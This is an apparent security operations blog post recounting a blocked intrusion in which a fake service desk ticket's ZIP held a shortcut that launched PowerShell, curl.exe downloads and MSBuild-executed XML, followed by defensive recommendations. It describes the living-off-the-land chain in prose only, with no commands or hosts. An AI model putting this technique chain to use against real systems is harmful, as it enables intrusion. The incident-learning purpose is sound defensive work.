The Zip File That Almost Broke In
A quiet alert flickered across the SOC dashboard early one morning. It didn’t scream for attention, no mass detections or large data transfers, just a single suspicious process. Yet something about it didn’t fit the pattern. One of our Level 1 Analysts trusted his instincts, and that small decision stopped a complex, multi-stage malware attack before it could take hold.
What began as a simple service desk ticket turned out to be a cleverly disguised intrusion attempt, one that could have led to a full compromise of the organisation’s environment.
The Setup: A Simple Mistake with Serious Consequences
It started when a user received a service desk ticket claiming that someone couldn’t access a particular website. Believing it was legitimate, the user downloaded a ZIP file attached to the ticket and opened it. Inside was a single shortcut file (.lnk).
Without hesitation, the user double-clicked it.
What they didn’t realise was that the shortcut was not what it appeared to be. It was a disguised command that launched PowerShell, Microsoft’s legitimate scripting tool, and triggered a chain of downloads and executions designed to install malicious files.
This single click could have opened a door for a Threat Actor to establish control over the machine, and potentially, the wider network.
The Technical Breakdown: Living off the Land
The SOC investigation revealed that the .lnk file was crafted to run PowerShell commands using curl.exe - a legitimate utility used for transferring data. The commands attempted to:
Download malicious content from compromised external websites, saving files in system folders like ProgramData.
Invoke MSBuild.exe (another legitimate Windows tool) to execute an XML file containing hidden instructions.
Run obfuscated scripts that gathered system information and attempted to download more payloads from obscure web sources, even disguising them as content from legitimate profiles.
This technique is known as “Living off the Land”, using trusted, built-in system tools (known as LoLBins, or Living-off-the-Land Binaries) to conduct malicious activity. Because these tools are legitimate, they often bypass traditional antivirus checks and appear harmless to untrained eyes.
In this case, the attacker’s objective was likely to create a Command and Control (C2) connection, giving them remote access to the infected system. From there, they could move laterally across the network, deploy ransomware, or exfiltrate sensitive data.
Fortunately, the organisation’s Endpoint Detection and Response (EDR) system detected and blocked the activity before the malware could execute fully. Quick isolation of the affected machine prevented the attack from spreading further.
The Lesson: When Curiosity Meets Convenience
The user had no malicious intent, just a moment of misplaced trust. They assumed the ticket and file were part of normal work. But this incident demonstrates how modern attacks often rely not on technical vulnerabilities, but on human behaviour.
Fake service desk tickets, falsified alerts, and realistic corporate messages are increasingly common social engineering tactics. Attackers know that IT and service teams deal with attachments and support requests daily, making them ideal targets.
To prevent similar incidents, organisations should:
- Implement mandatory phishing and social engineering training, tailored for service desk and IT support roles.
- Verify attachments and URLs within internal ticketing systems before interaction.
- Restrict PowerShell, WScript, and MSBuild on non-developer machines.
- Monitor and alert on downloads initiated by command-line tools such as curl.exe.
- Conduct regular EDR policy reviews to ensure new evasion techniques are detected.
Conclusion: A Quiet Win and a Critical Reminder
This case is a powerful example of why constant vigilance in the SOC matters, and how one click can make or break an organisation’s security. Thanks to a sharp analyst, strong EDR configuration, and fast response procedures, the threat never progressed beyond the first stage.
The story ends quietly this time. But it’s a reminder that behind every alert, no matter how small, could be the start of something far bigger, and far more dangerous.
